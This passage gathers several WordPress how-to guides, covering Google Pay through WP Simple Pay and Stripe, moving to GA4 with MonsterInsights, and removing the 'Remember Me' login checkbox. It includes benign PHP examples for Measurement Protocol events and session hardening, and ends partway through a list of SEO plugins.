How to Accept Google Pay in WordPress (The Easy Way)

Would you like to accept Google Pay on your WordPress site?

When you allow your customers to choose their preferred payment method, you’ll build trust and increase conversions on your website.

In this article, we’ll show you how to accept Google Pay in WordPress.


Why Accept Google Pay in WordPress?

If you’re selling products or services on your WordPress website or asking for donations, then it’s important to let your visitors pay using their preferred method.

Often they will want to pay by credit card or PayPal, but newer methods like Google Pay and Apple Pay are becoming more popular.

Google Pay is available in 40 countries around the world and makes online payments simple. However, it is only offered when the customer's browser and device support it (for example Chrome, or an Android device, with a card saved to their Google account), so you'll want to include additional payment options for everyone else.

That being said, let’s take a look at how to accept Google Pay in your online store.

Note: We’ll cover how to add a Google Pay option in WordPress without adding a full eCommerce cart, but we will leave other helpful resources at the end of this article for those looking for full eCommerce solutions.

How to Accept Google Pay in WordPress

The first thing you need to do is install and activate the WP Simple Pay plugin. For more details, see our step by step guide on how to install a WordPress plugin.

WP Simple Pay is a simple yet powerful WordPress invoicing and payments plugin. The best part is that WP Simple Pay does not charge you any additional transaction fees, and you can set it up without the complexity of a cart system.

It lets you add Apple Pay, Google Pay, credit card as well as ACH bank payments, so you can give users multiple payment options which improves conversion.

While there is a free version of the plugin, you need the Pro plugin to accept Google Pay, create on-site payment forms, and more.

Upon activation, the WP Simple Pay setup wizard will start automatically. You simply need to click the ‘Let’s Get Started’ button to continue.

The WP Simple Pay Setup Wizard Will Start Automatically

On the first page, you’ll be asked to enter your license key. You can find this information from your account on the WP Simple Pay website.

After that, you need to click the ‘Activate and Continue’ button to move to the next step.

You’ll Be Asked to Enter Your WP Simple Pay License Key

On the second page, you will need to connect WP Simple Pay to Stripe. Stripe is a popular payment gateway, and it’s the easiest way to add Google Pay to your website. It also supports all top credit and debit cards, Apple Pay, ACH payments, and more. With Stripe Checkout, customers enter their card details on a page hosted by Stripe, so card numbers never pass through your WordPress server.

Simply click the ‘Connect with Stripe’ button, and from there you can log in to your Stripe account or create a new one. Anyone with a legitimate business can create a Stripe account and accept payments online.

You Need to Connect WP Simple Pay to Stripe

Note: Stripe requires your site to be using SSL/HTTPS encryption. If you don’t already have an SSL certificate for your website, then please see our step by step guide on how to add SSL in WordPress.

Once you’ve connected to Stripe, you’ll be asked to configure your WP Simple Pay emails.

Payment receipt and invoice emails to your customers are enabled by default, as are payment notification emails to you.

Configure Your WP Simple Pay Emails

You just need to enter the email address where the notifications should be sent.

Once you’ve done that, you need to click the ‘Save and Continue’ button to complete your setup of WP Simple Pay.

WP Simple Pay Setup Is Complete

Google Pay is enabled by default when using Stripe Checkout, and will be offered automatically to customers in participating countries whose browser and device support it.

If you decide to disable Google Pay in the future, then you will need to change the payment method settings in the Stripe Dashboard.

Creating a Payment Form in WordPress

Next, you need to create a payment form.

You can do that by clicking the ‘Create a Payment Form’ button on the last page of the setup wizard. This will automatically take you to the WP Simple Pay » Add New page.

You’ll be shown a list of payment form templates. You need to scroll down until you locate the Apple Pay / Google Pay template.

Simply hover over the template and click the ‘Use Template’ button when it appears.

Select the Apple Pay / Google Pay Template

This will take you to the payment form editor.

If you like, you can rename the form and give it a description. After that, you need to select the ‘Stripe Checkout’ option under Form Type.

Select the Stripe Checkout Option

After you’ve done that, we’ll move on to the Payment tab.

Here you can set the payment mode to either live or testing. Testing mode uses your Stripe test keys: real cards are declined, and you pay with Stripe’s test card numbers (for example 4242 4242 4242 4242) so you can make sure your form is working properly and emails are being sent without moving any money.

Don’t forget to change this to ‘Live’ when you’ve finished testing and are ready to start receiving payments from your customers.

Set the Payment Mode to Either Live or Testing

You can also add the products or services that you offer, along with their prices and whether they are a one-time payment or a subscription.

Simply click the ‘Add Price’ button until you have added as many prices as you need. After that, you will need to add a label and price for each one. You can also select other options, such as recurring payments, or letting the user set the price, as for a donation.

Add Your Products and Services to the Payment Form

You can show or hide a price by clicking the small arrow on the right.

Next, we’ll move on to the ‘Form Fields’ tab. Notice that the essential fields have already been added to the form, including an ‘Apple Pay / Google Pay’ button, credit card details, and a checkout button.

The Essential Form Fields Have Been Added For You

Using the ‘Form Fields’ drop down, you can choose additional fields and add them by clicking the ‘Add Field’ button. Options include name, phone number, address, and much more.

Finally, the ‘Stripe Checkout’ tab allows you to select additional payment methods and tweak the checkout form that is displayed after the user clicks the ‘Pay’ button.

For this tutorial, we’ll leave those settings as they are.

Select any Additional Payment Methods and Tweak the Checkout Form

When you are happy with your payment form, click on the ‘Publish’ button to store your settings and push the form live.

Now we can add the form to a post or page on your website.

Adding the Payment Form to Your Website

WP Simple Pay makes it super easy to add forms anywhere on your website.

Simply create a new post or page, or edit an existing one. Then, click on the plus (+) sign at the top and add a WP Simple Pay block in the WordPress block editor.

Insert a WP Simple Pay Block and Choose the Correct Form

After that, select your order form from the dropdown menu in the WP Simple Pay block.

Once you’re finished, you can update or publish the post or page, and then click on the preview button to see your form in action.

WP Simple Pay Payment Form Preview

When your users click the Pay button, the Stripe checkout form will be displayed.

If their browser and device support Google Pay, then the Google Pay option will be displayed at the top of the form. Otherwise, the Google Pay option will be hidden, and your customers can pay using a credit card.

Stripe Checkout Preview With Google Pay

If you’re looking for other ways to add Google Pay in WordPress, then you can use full eCommerce solutions like Easy Digital Downloads or WooCommerce. Both of them have support for Apple Pay and Google Pay options.

We hope this tutorial helped you learn how to accept Google Pay in WordPress. You may also want to learn the right way to create an email newsletter, or check out our expert pick of the best contact form plugins for WordPress.

Source: https://www.wpbeginner.com/plugins/how-to-accept-google-pay-in-wordpress/

How to Switch to Google Analytics 4 in WordPress (The RIGHT Way)

Are you looking to switch to the latest Google Analytics version?

Google is now recommending that website owners move to the new Google Analytics 4 because it will sunset the previous Universal Analytics on July 1, 2023. After the sunset date, the older version will no longer process data.

In this article, we’ll show you how to easily switch to Google Analytics 4 in WordPress.

Switch to Google Analytics 4 in WordPress

Why Switch to Google Analytics 4?

Google Analytics 4 (GA4) is the latest version of Google Analytics. It lets you track your mobile apps and websites in the same account, and offers new metrics, reports, and tracking features.

If you haven’t created a GA4 property yet, then now is the best time to switch to the latest version. That’s because Google announced that it will be closing down the old Universal Analytics on July 1, 2023.

What this means is that Universal Analytics will stop receiving data from your WordPress website after the sunset date, and none of that historical data is migrated into GA4.

Switching to Google Analytics 4 as soon as possible will protect you from starting from scratch with no historical data.

To do this right, a lot of smart website owners are using the dual tracking method, which lets you keep using Universal Analytics while you start sending data to GA4.

This way, you can future-proof your data while giving yourself plenty of time to learn the new Google Analytics dashboard and features.

That being said, let’s see how you can switch to Google Analytics 4 in WordPress with dual tracking.

Video Tutorial

https://youtube.com/watch?v=8dihyjwMNnE


If you’d prefer written instructions, just keep reading.

Creating a Google Analytics 4 Property

If you already have an existing Google Analytics account using the old version, then you can easily create a new GA4 property and start sending stats to GA4.

First, you’ll need to visit the Google Analytics website and login to your account.

After that, head over to the ‘Admin’ settings page in the bottom left corner.

Click admin settings

If you’re on Universal Analytics, then you’ll see the option to set up GA4.

Go ahead and click on ‘GA4 Setup Assistant’ under the Property column.

Click on GA4 setup assistant

In the next step, the setup assistant will give you 2 options. You can create a new Google Analytics 4 property or connect an existing one.

Since we’re setting up a new property, simply click the Get Started button under the ‘I want to create a new Google Analytics 4 property’ option.

Create a new GA4 property

A popup will now appear with the details about the setup wizard.

If you’ve implemented your Universal Analytics using the Global Site Tag (gtag.js) code, then you’ll see an option to Enable data collection using existing tags.

This uses the existing tracking code on your site to collect information. That said, if you don’t already have the right tracking code on your website, we’ll show you how to add it to your WordPress blog below.

For now, you can go ahead and click the ‘Create property’ button.

Click the create property button

The setup wizard will add a new GA4 property and copy the Universal Analytics property name, website URL, timezone, and currency settings.

You can now view your new Google Analytics 4 property in the GA4 Setup Assistant.

View your connected property

Next, you’ll need to click on the ‘See your GA4 property’ button to see your Google Analytics tracking code.

After clicking on the button, simply click on the ‘Tag installation’ option to retrieve your tracking code.

Go to tag installation

You should now see your new GA4 property under Data Streams.

Go ahead and click on your new property.

Select your data stream

A new window will slide in from the right, and you’ll be able to see your web stream details.

Note: Google Analytics 4 uses both ‘data stream’ and ‘web stream’. These both simply mean the flow of analytics data that Google Analytics receives from your website.

Simply scroll down to the Tagging Instructions section and click the Global site tag (gtag.js) option to expand the settings. You’ll now see your Google Analytics tracking code that needs to be added to your WordPress site.

See web stream details

One thing you need to know is that Google Analytics 4 reports are quite different from what you’re used to in Universal Analytics.

They have introduced new terminology, and many familiar metrics and reports are missing completely. Basically, if you were using common reports like the Top Landing Pages report, then you’d have to recreate those from scratch in Google Analytics 4.

That’s why we recommend using MonsterInsights Pro or even the free version of MonsterInsights.

It will help you see all the familiar analytics reports right in your WordPress dashboard, and it also lets you use both Universal Analytics and Google Analytics 4 at the same time.

Not to mention, with MonsterInsights you get all the powerful tracking features such as outbound link tracking, author tracking, and more which can be enabled without writing any code.

Let’s take a look at how to easily set up Google Analytics 4 on your WordPress site with MonsterInsights.

Adding Google Analytics Tracking Code to WordPress Site

The best way to add Google Analytics tracking code to your WordPress website is by using MonsterInsights. This is the plugin that we use on WPBeginner.

MonsterInsights is the best Analytics solution for WordPress, and it’s trusted by over 3 million websites because it lets you easily set up advanced tracking without any coding skills.

You can use the MonsterInsights Lite version to set up Google Analytics in no time. There are also premium MonsterInsights plans that offer more features like custom dashboard reports, email summaries, scroll tracking, eCommerce tracking, premium integrations, and more.

MonsterInsights also offers dual tracking, meaning you can use both Universal Analytics and Google Analytics 4 at the same time. This is available in both the free and the paid version, and we highly recommend using it to ensure that your transition to GA4 goes smoothly.

First, you’ll need to install and activate the MonsterInsights plugin. For more details, please see our guide on how to install a WordPress plugin.

Upon activation, you’ll be taken to the MonsterInsights welcome screen in your WordPress dashboard. Simply click the ‘Launch the Wizard’ button to add Google Analytics to your site.

Launch setup wizard

After clicking the button, the setup wizard will ask you to choose a category that best describes your website.

You can choose from a business website, publisher (blog), or online store. Once you’ve selected a category, click the ‘Save and Continue’ button.

The MonsterInsights setup wizard

In the next step, you’ll need to connect MonsterInsights with your WordPress site.

Go ahead and click the ‘Connect MonsterInsights’ button.

Connect MonsterInsights with your site

Once you click the button, you’ll need to sign in to your Google Account.

Simply select your account and click the ‘Next’ button.

Choose Google account to sign in

Next, MonsterInsights will require access to your Google Analytics Account.

This is a standard Google OAuth consent screen. The MonsterInsights app needs these permissions so it can help you set up analytics properly and show you all the relevant stats right inside your WordPress dashboard; review the listed permissions before allowing them, since they grant the MonsterInsights service access to your Analytics account.

You can click the ‘Allow’ button to continue.

Allow access to your Google account

After that, you’ll be redirected back to the MonsterInsights setup wizard.

To complete the connection, select your Google Analytics 4 property from the dropdown menu and click the ‘Complete Connection’ button.

Select your GA4 property

Next, MonsterInsights will connect Google Analytics with your WordPress website.

On the next screen, you’ll see some recommended settings like file download tracking and affiliate link tracking.

You can use the default settings in the setup wizard. However, if you’re using an affiliate link plugin, then you’ll need to enter the path you use to cloak the affiliate links.

Recommended settings

Next, you can scroll down and select who can see reports and add different WordPress user roles.

Once you’re done, click the ‘Save and continue’ button.

Who can see the reports

After that, MonsterInsights will show different tracking features that you can enable for your website.

You can scroll down and click the ‘Skip for Now’ button.

Choose which tracking features to enable

Next, you’ll see a checklist showing that you’ve successfully connected Google Analytics to your website.

For example, it will show that you’re successfully connected to Google Analytics, the tracking code is properly installed, and the data is being collected.

Tracking should be all setup

That’s it, you’ve added Google Analytics 4 property to your WordPress site.

Creating a Measurement Protocol API Secret

If you want MonsterInsights to track eCommerce purchases, form conversions, and other advanced events in Google Analytics, then you’ll need to create a Measurement Protocol API Secret.

First, you’ll need to go back to your Google Analytics account and then go to Admin settings. Next, click on the ‘Data Streams’ option under the Property column.

Go to admin and data stream settings

Then you’ll need to select the Google Analytics 4 property that we created earlier.

Go ahead and select your property under Data Streams.

Select your data stream

After that, you can scroll down to the ‘Advanced Settings’ section.

Simply click the ‘Measurement Protocol API secrets’ option.

Select measurement protocol API secrets option

A new window will now slide in with your Measurement Protocol API secrets.

You will have to click the ‘Create’ button.

Create an API key

After that, enter a nickname for your API secret so it’s easily identifiable.

When you’re done, click the ‘Create’ button.

Enter a name for your API

You should now see your Measurement Protocol API secret.

Simply copy the API secret under the ‘Secret value’ field. Treat this value like a password: anyone who has it can send arbitrary events into your GA4 property. It will be stored in your WordPress database, so limit who has administrator access, and delete and recreate the secret here if it ever leaks.

Copy the secret value

After that, you can head back to your WordPress website and navigate to Insights » Settings from your dashboard.

Now click on the ‘General’ tab at the top.

General settings tab in MonsterInsights

Next, you will have to scroll down to the ‘Google Authentication’ section.

Go ahead and enter the Secret value you just copied in the Measurement Protocol API Secret field.

Enter measurement protocol API secret in MonsterInsights

You’ve successfully added Measurement Protocol API Secret in MonsterInsights.
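To see why Google calls this value a secret, here is an added example of what it authorises. It is not MonsterInsights’ code; it talks to Google’s Measurement Protocol endpoints directly. The measurement ID, the secret and the purchase event are placeholders (read from environment variables, with constructed sample values otherwise), and the file name is assumed. Anyone holding the secret can run the same request and inject events into your property, which is why it should never be committed to source control or pasted into support tickets.

```php
<?php
// Added example: what a GA4 Measurement Protocol API secret authorises.
// Not MonsterInsights' code. The measurement ID, secret and event values
// are placeholders; real ones come from environment variables so they
// never sit in source control.

const GA4_DEBUG_ENDPOINT = 'https://www.google-analytics.com/debug/mp/collect';
const GA4_LIVE_ENDPOINT  = 'https://www.google-analytics.com/mp/collect';

/**
 * Build the URL and JSON body for one server-side event.
 * Google puts the secret in the query string, so it appears in proxy and
 * web-server logs along the way: rotate it (delete and recreate it in
 * GA Admin) if those logs are ever exposed.
 */
function ga4_build_request(string $measurement_id, string $api_secret, string $client_id, string $event, array $params, string $endpoint = GA4_DEBUG_ENDPOINT): array
{
    $url = $endpoint . '?' . http_build_query([
        'measurement_id' => $measurement_id,
        'api_secret'     => $api_secret,
    ]);
    $body = json_encode([
        'client_id' => $client_id, // visitor id, normally taken from the _ga cookie
        'events'    => [['name' => $event, 'params' => $params]],
    ], JSON_UNESCAPED_SLASHES);
    return ['url' => $url, 'body' => $body];
}

/** POST the event and return [HTTP status, response body]. */
function ga4_send(array $request): array
{
    $ctx = stream_context_create(['http' => [
        'method'        => 'POST',
        'header'        => "Content-Type: application/json\r\n",
        'content'       => $request['body'],
        'ignore_errors' => true, // keep the response body on 4xx/5xx
        'timeout'       => 10,
    ]]);
    $response = file_get_contents($request['url'], false, $ctx);
    $status   = 0;
    if (isset($http_response_header[0]) && preg_match('#^HTTP/\S+\s+(\d{3})#', $http_response_header[0], $m)) {
        $status = (int) $m[1];
    }
    return [$status, (string) $response];
}

// Constructed purchase event for illustration.
$request = ga4_build_request(
    getenv('GA4_MEASUREMENT_ID') ?: 'G-XXXXXXXXXX', // placeholder
    getenv('GA4_API_SECRET')     ?: 'replace-me',   // placeholder
    '555.1234567890',
    'purchase',
    ['transaction_id' => 'T-1001', 'value' => 49.00, 'currency' => 'USD']
);

if (getenv('GA4_API_SECRET') === false) {
    // No real secret available: show the body that would be sent, never the URL.
    echo "Request built (set GA4_MEASUREMENT_ID and GA4_API_SECRET to send it):\n";
    echo $request['body'], "\n";
} else {
    // The debug endpoint validates without recording; a well-formed event
    // returns {"validationMessages":[]}. Switch to GA4_LIVE_ENDPOINT to record.
    [$status, $body] = ga4_send($request);
    echo "$status $body\n";
}
```

Run it with php ga4-mp-example.php. The debug endpoint is the safe place to test: it reports malformed events and writes nothing to the property, whereas the live endpoint accepts whatever the secret holder sends and answers 2xx regardless.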

Setting Up Universal Analytics Dual Tracking

Now that you have setup GA4, the next step is to enable dual tracking for Universal Analytics, so it can run alongside your Google Analytics 4 property in WordPress.

With MonsterInsights, you can easily set up dual tracking and simultaneously track both properties without writing code.

Note: If you already have Universal Analytics tracking code added to your WordPress website, then we recommend disabling it first. Otherwise, it could lead to double-tracking and can skew your data.

To start setting up dual tracking properly, you can head to Insights » Settings from your WordPress admin panel and then click on the ‘General’ tab.

General settings tab in MonsterInsights

Next, you’ll need to scroll down to the ‘Google Authentication’ section.

Now under the Dual Tracking Profile, enter your Universal Analytics (UA) code.

Enter your UA Code

You can easily find your UA code in Google Analytics Admin settings.

Simply go to the Admin settings page in Google Analytics of your Universal Analytics property.

Click admin settings

Then click on ‘Property Settings’ under the Property column.

You should see the Tracking ID, and it will look like this: UA-123856789-5

Find your tracking ID

You’ve now successfully set up dual tracking on your WordPress website.

To see how your website is performing, simply go to Insights » Reports. Here you’ll find all the data you need to make the right decisions to grow your website.

Dashboard reports

We hope this article helped you learn how to switch to Google Analytics 4 in WordPress. You may also want to see our ultimate WordPress SEO guide to improve your rankings, or see our comparison of the best email marketing services for small business.

Source: https://www.wpbeginner.com/wp-tutorials/how-to-switch-to-google-analytics-4-in-wordpress/

How to Remove the Remember Me Option from WordPress Login

Do you want to remove the remember me option from your WordPress login page?

The ‘Remember Me’ option is a small checkbox on the WordPress login screen that keeps you and your users logged in for longer. It does not save the username or password; it extends the lifetime of the login cookie.

In this article, we’ll show you how to remove the ‘Remember Me’ option, step by step.

How to Remove the Remember Me Option from Your WordPress Login (2 Ways)

Why Remove ‘Remember Me’ from Your WordPress Login Screen?

When you or your website users check the ‘Remember Me’ box on the WordPress login page, WordPress issues its login cookie with a 14-day lifetime instead of the default 2 days, and the browser keeps it after the window is closed. The cookie holds a signed session token, not the password.

Remember me checkbox example

That means that next time they’re on your site, they can access the dashboard right away without having to go to the login page again.

Although it makes logging in faster, it could be a potential security risk for people accessing their WordPress admin area from public computers and WiFi networks.

By disabling the ‘Remember Me’ checkbox, login cookies go back to the default: the browser treats them as session cookies that are discarded when it closes (unless it is set to restore the previous session), and the server-side session expires after two days. Users can still save their username and password in their browser’s password manager or a password manager app so they don’t have to type them in every time.

Overall, this shortens the window in which a stolen or left-behind login cookie can be reused, which improves your WordPress security.

With that said, let’s show you how to remove the ‘Remember Me’ option on your WordPress login page. Simply use the quick links below to jump straight to the method you want to use.

Method 1. Removing the Remember Me Option from the Default WordPress Login Page

The easiest way to remove the remember me option from the default WordPress page is by using the Remember Me Controls plugin. 

First thing you need to do is install and activate the plugin. For more details, see our beginner’s guide on how to install a WordPress plugin.

Note: We’ve tested the plugin as of this post’s last updated date, and it works with WordPress 6.0 with no issues. 

Upon activation, navigate to Settings » Remember Me to configure the plugin settings.

Then, simply check the box in the ‘Disable the “Remember Me” feature’ section and click the ‘Save Changes’ button.

Disable remember me checkbox

Now, you can log out of your WordPress site.

When you return to the login screen, the ‘Remember Me’ checkbox will be gone. To confirm the change took effect on the server and not just in the page, log in and look at the wordpress_logged_in_ cookie in your browser’s developer tools: its expiry should show as Session rather than a date two weeks away.

Remember me checkbox disabled
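If you would rather not add a plugin, or want to be certain the restriction is enforced on the server rather than only in the browser, the following added example (not code from the Remember Me Controls plugin or from WordPress core) does the same job as a must-use plugin. It hides the checkbox on wp-login.php and in wp_login_form() output, and it also caps the login cookie lifetime server-side, because hiding the box does nothing against a crafted login request that still sends rememberme=forever. The file name and the two-day lifetime are assumptions; two days is WordPress’s default for an unremembered login.

```php
<?php
/**
 * Plugin Name: Disable Remember Me (added example)
 * Description: Hides the checkbox and, separately, stops a login from being
 * remembered even if a request still sends rememberme=forever.
 *
 * Save as wp-content/mu-plugins/disable-remember-me.php (file name assumed);
 * must-use plugins load on every request without activation.
 */

// 1. Cosmetic: hide the checkbox on the default wp-login.php screen.
add_action( 'login_head', function () {
    echo '<style>.login form .forgetmenot { display: none; }</style>';
} );

// 2. Cosmetic: drop it from wp_login_form(), which custom login pages often use.
add_filter( 'login_form_defaults', function ( array $defaults ) {
    $defaults['remember'] = false;
    return $defaults;
} );

// 3. Enforcement: discard the flag before wp-login.php hands it to wp_signon(),
//    so the login cookie is issued as a session cookie (browser expiry 0).
add_action( 'login_init', function () {
    unset( $_POST['rememberme'] );
} );

// 4. Enforcement for any other code path that calls wp_signon() with
//    'remember' => true: cap the server-side session at two days (assumed;
//    WordPress's default for an unremembered login) regardless of what the
//    caller asked for. A cookie issued that way is still persistent, but it
//    dies with the session token instead of lasting 14 days.
add_filter( 'auth_cookie_expiration', function ( $length, $user_id, $remember ) {
    return 2 * DAY_IN_SECONDS;
}, 10, 3 );
```

After adding the file, log in and check the wordpress_logged_in_ cookie in your browser’s developer tools; its expiry should read Session. Remembered sessions issued before the change stay valid until they expire or are revoked with the ‘Log Out Everywhere Else’ button under Users » Profile.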

Method 2. Removing the Remember Me Option from Custom WordPress Login Pages

If you’re creating a custom WordPress login page for your WordPress membership site or online store, then you can hide the ‘Remember Me’ option by using SeedProd.


SeedProd is the best drag and drop WordPress page builder in the market used by over 1 million websites. You can use it to create a completely custom WordPress theme without writing any code.

Aside from creating custom WordPress themes, SeedProd also comes with the ability to create custom WordPress login pages, custom 404 pages, and more.

First, you will need to use SeedProd plugin to create a custom login page. For more details, see our step by step guide on how to create a custom login page.

Then, when you’re customizing the login page, you can disable the ‘Remember Me’ option by clicking on the ‘Additional Options’ drop down in the left-hand options menu.

Click additional options in page builder

Next, delete the text in the ‘Remember User Label’ box. 

Then, click the ‘Save’ button and select the ‘Publish’ drop down to make your login page live.

Delete remember me text and publish

Now, you can visit your custom login page to see the ‘Remember Me’ option is gone.

Custom login page no remember me

We hope this article helped you learn how to remove the remember me option from your WordPress login page. You may also want to see our ultimate guide on how to speed up WordPress, and our expert picks of the best business phone services for small businesses.

Source: https://www.wpbeginner.com/plugins/how-to-remove-the-remember-me-option-from-your-wordpress-login/

14 Best WordPress SEO Plugins and Tools That You Should Use

Often we’re asked about what are the best WordPress SEO plugins and tools that we recommend.

That’s because search engines are a major source of traffic for most websites on the internet. Optimizing your website for search engines can help you rank higher in search results and significantly grow your business.

In this article, we will share the best WordPress SEO plugins and tools that you should use. Some of these tools offer similar functionalities, so we will also highlight which ones are the best for specific use-cases.


Things You Must Know About WordPress SEO Plugins & Tools

When reading SEO WordPress tips or searching for “best free WordPress SEO plugins”, you will come across articles that feature several dozen tools.

This can be quite overwhelming for beginners and non-techy users.

The truth is that you don’t need dozens of top SEO tools to get higher search engine result rankings.

While most blog posts (including ours) will share the top most popular SEO plugins, it is extremely important for you to understand the use-cases of each tool.

For example, you never want to use more than one WordPress SEO plugin on your website. We will mention All in One SEO (formerly All in One SEO Pack), Yoast SEO, SEOPress, and Rank Math. You need to pick only one to avoid plugin conflict.

We’ll mention SEMRush, Ahrefs, and a few other powerful tools, but you don’t need them all when you’re first starting out since they have a similar feature set. We will share what tools we use in our business, and which features are the best in each tool.

With that said, let’s take a look at our expert pick of the best WordPress SEO plugins and tools.

1. All in One SEO for WordPress (AIOSEO)


All in One SEO for WordPress (AIOSEO) is the best WordPress SEO plugin on the market. Used by over 3 million users, it is the most comprehensive SEO toolkit that helps you improve search rankings without learning any complicated SEO jargon.

The free version of AIOSEO has all the essential features, but the pro version gives you everything you need to outrank your competitors.

It comes with the easiest setup wizard that automatically helps you choose the best SEO settings for your business. AIOSEO shows you TruSEO on-page analysis with an actionable checklist to optimize your posts and pages.

The on-page SEO checklist includes a smart meta tag generator where you can use dynamic values (current year, month, day, custom fields, author info, and much more) in your SEO title and meta descriptions. This means you don’t need to update a post just to change SEO titles.

All in One SEO (AIOSEO) dynamic meta title and description

AIOSEO also comes with Rich snippet schema markup, smart XML sitemaps (with advanced controls), SEO health check, and other useful features to grow your search engine visibility.

There is a built-in social media integration to add Open Graph metadata as well. This means you can choose which image or thumbnail you want to show when your pages are shared on social media websites like Facebook, Twitter, Pinterest, etc.

All in One SEO for WordPress (AIOSEO) social media profiles

AIOSEO also comes with built-in WooCommerce SEO tools for eCommerce sites. This includes features like dynamic optimizations, individual product page optimizations, product image SEO, and other handy features to bring more organic traffic to your online store.

For more SEO savvy users, it includes full control of RSS feeds, Robots.txt editor, local SEO, breadcrumbs, Google News sitemaps, video SEO, advanced redirect manager, 404 tracking, IndexNow integration, and more.

For business owners, it comes with SEO user roles, so you can manage access to important SEO features without handing over control of your website.

Update: Recently AIOSEO added a Link Assistant which is a game-changer for internal linking. It helps identify link opportunities, gives you linking suggestions in real-time, and you can bulk-add internal links with just a few clicks.

Overall, All in One SEO (AIOSEO) is the most beginner-friendly and comprehensive WordPress SEO plugin on the market. It’s easy to configure and eliminates the need to install multiple plugins to do things on your WordPress site. It works perfectly for all types of businesses, eCommerce, blogs, news, and other websites.

As a WPBeginner user, you get 50% off AIOSEO Pro.

For those who’re on a budget, you can use the free version of AIOSEO to get started.

2. SEMRush


SEMRush is the best overall SEO tool on the market. Used by professional SEO experts, marketers, bloggers, large and small businesses, it provides a comprehensive set of tools to grow your traffic.

You can use it to find organic keywords and search terms that you can easily rank for. It also allows you to do competitive research and see which keywords your competitors rank for, and how you can beat them.

SEMRush SEO Writing Assistant tool helps you improve your website content to beat the top 10 results for your focus keyword. It integrates with WordPress, and this will help you write more SEO-friendly content.

You can also generate SEO templates and get easy search engine optimization suggestions for your content along with advanced SEO recommendations.

SEMRush seamlessly integrates with All in One SEO (AIOSEO) to help you find additional keyphrases for your focus keyphrase. You can see related keyphrases and their search volume right from WordPress. Then, you can add them to your content with the click of a button.

AIOSEO's Semrush integration

To learn more, see our complete guide on how to do keyword research for your website.

We use SEMRush for our websites because of their competitive intelligence and SEO rank tracker features.

3. Google Search Console


Google Search Console is a free tool offered by Google to help website owners and webmasters monitor and maintain their site’s presence in Google search results.

It alerts you when Google is unable to crawl and index pages on your website. You also get helpful tips on how to fix those crawl errors.

Most importantly, it shows which keywords your website is ranking for, anchor texts, average position, impressions, and more. You can use this data to find keywords where you can easily rank higher by simply optimizing your content. You can also use this keyword data to come up with new blog post ideas.

For more details, see our comprehensive Google Search Console guide for beginners.

Tip: You can use MonsterInsights to track your keyword rankings inside the WordPress admin area using Google Search Console data. We will cover this tool later in the article below.

4. Yoast SEO


Yoast SEO is a popular WordPress SEO plugin that allows you to optimize your WordPress website for search engines.

It lets you easily add SEO titles and descriptions to all posts and pages on your website. You can also use it to add Open Graph metadata and social media images to your articles.

Yoast SEO automatically generates an XML sitemap for all your website content which makes it easier for search engines to crawl your website. It also helps you easily import your SEO data if you have been using another SEO plugin.

Other features include readability analysis, Google and social previews, and faster load times for a better user experience.

For more details, see our complete guide on how to install and set up Yoast SEO plugin in WordPress.

5. Google Keyword Planner

google keyword planner

Google Keyword Planner tool helps you generate your own keyword ideas from Google itself.

No one on the planet has more insight into what people are searching for than the search giant Google. This tool is offered to Google’s advertisers for free, and anyone can use it. Its main purpose is to show advertisers the keywords they can bid on for their advertising campaigns.

It also helps advertisers choose the right keywords by showing them an estimate of search volume, number of results, and difficulty level.

As a content marketer or blogger, you can use this data to find keywords with high search volume, high advertiser interest, and more importantly keywords where you can easily outrank all other sites.

Bonus: See these 103 Blog Post Ideas that your Readers will Love (Cheat Sheet).

6. Ahrefs

ahrefs

Ahrefs is an all-in-one SEO analysis tool for marketers, bloggers, and businesses. It is a popular alternative to SEMRush and offers a lot of similar tools and features.

It allows you to do keyword research, competition analysis, backlink research, SEO audit, monitor keyword rankings, and more.

It also offers a detailed content analysis tool that helps you improve content while targeting specific keywords.

While there’s a huge feature overlap, what Ahrefs does really well is backlink analysis. We can use it to see which sites are linking to multiple competitors, but not us. This helps us get more backlinks and build more partnerships.

It also helps us identify content that several of our competitors are ranking for but we aren’t, so we can create content on those subjects to get more exposure.

Last but not least, Ahrefs helps us better identify duplicate content and keyword cannibalization which helps us merge and upgrade the right content to boost our rankings.

For the reasons above, we pay for both SEMRush and Ahrefs because they’re both good for specific use-cases.

7. SEOPress

seopress

SEOPress is another simple yet powerful WordPress SEO plugin. It includes all the features you would expect from an SEO plugin like meta title, description, open graph support, image and content XML sitemaps, redirects, and more.

It comes with a straightforward setup for beginners and advanced controls for more experienced users. It is comparable to other top WordPress SEO plugins on the market in terms of features and options.

The paid version of the plugin is cheaper than some other premium WordPress SEO plugins on the market.

Note: SEOPress is a WordPress SEO plugin. Remember, you only need one WordPress SEO plugin on your site.

8. Rank Math

rankmath

Rank Math is another user-friendly WordPress SEO plugin that allows you to optimize your website for search engines and social media. It comes with a setup wizard and allows you to import data from other SEO plugins during the setup.

You can use it to easily add meta title, description, and Open Graph metadata to your blog posts. The plugin also allows you to generate an XML sitemap, connect Google Search Console, and control access to plugin features based on user roles.

Note: Rank Math is an AIOSEO alternative. Remember, you only need one WordPress SEO plugin on your site.

9. Schema Pro

schema pro

Schema Pro allows you to add rich snippets to your website which makes it stand out in search results.

Rich Snippets allow you to make your website stand out in search results by showing star ratings below a review, prices below a product, image or video next to the description, and so on.

Top WordPress SEO plugins, like All in One SEO (AIOSEO) already add structured rich snippets data to your website. However, if you need more schema types or want to extend the functionality of your existing WordPress SEO plugin then Schema Pro is the way to go.

Schema Pro also allows you to use it alongside your existing WordPress SEO plugin by mapping the plugin data to Schema Pro fields.

10. KeywordTool.io

keyword tool io

KeywordTool.io is one of the best free keyword research tools available right now. It allows you to simply generate keyword ideas by typing in a keyword. These keyword suggestions are gathered from Google’s autosuggest feature. It also shows you keyword suggestions from Bing, YouTube, Amazon, and more.

These keyword suggestions are a treasure of information. You can also get search volume, cost per click, and other data for each keyword by upgrading to their paid plan.

11. Redirection

redirection plugin

Redirection helps you set up SEO friendly redirects in WordPress. It is a handy broken link checker that helps you easily fix 404 errors in WordPress by setting up redirects.

Broken links can affect your site’s SEO and create a bad experience for your users. If you have been running a blog for some time, then you should check your site from time to time for broken links and fix them.

There are multiple ways to easily find broken links in WordPress. Once you find a broken link, you may need to fix it by pointing users to the correct link or removing the incorrect link.

For more details, see our step by step guide on how to find and fix broken links in WordPress.

Alternative: AIOSEO Advanced Redirects is a powerful alternative to the Redirection plugin.

12. SEOQuake

seoquake

SEOQuake is a useful SEO tool for website owners. It is available as a browser add-on for Google Chrome, Mozilla Firefox, Opera, and Safari web browsers.

